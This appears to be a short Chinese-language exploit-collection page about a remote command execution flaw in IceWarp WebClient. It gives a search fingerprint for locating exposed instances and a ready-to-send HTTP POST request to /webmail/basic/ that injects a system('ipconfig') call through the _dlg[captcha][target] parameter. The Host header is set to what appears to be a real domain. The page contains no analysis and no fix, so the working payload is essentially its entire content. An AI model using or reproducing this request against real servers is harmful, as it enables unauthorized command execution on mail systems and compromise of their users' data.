Last updated 3 years ago
Was this helpful?
IceWarp WebClient 存在远程命令执行漏洞,攻击者构造特殊的请求即可远程命令执行
Note
IceWarp WebClient
app="IceWarp-公司产品"
登录页面如下
漏洞请求包为
POST /webmail/basic/ HTTP/1.1 Host: sd.sahadharawat.com Content-Type: application/x-www-form-urlencoded Cookie: use_cookies=1 Content-Length: 43 _dlg[captcha][target]=system(\'ipconfig\')\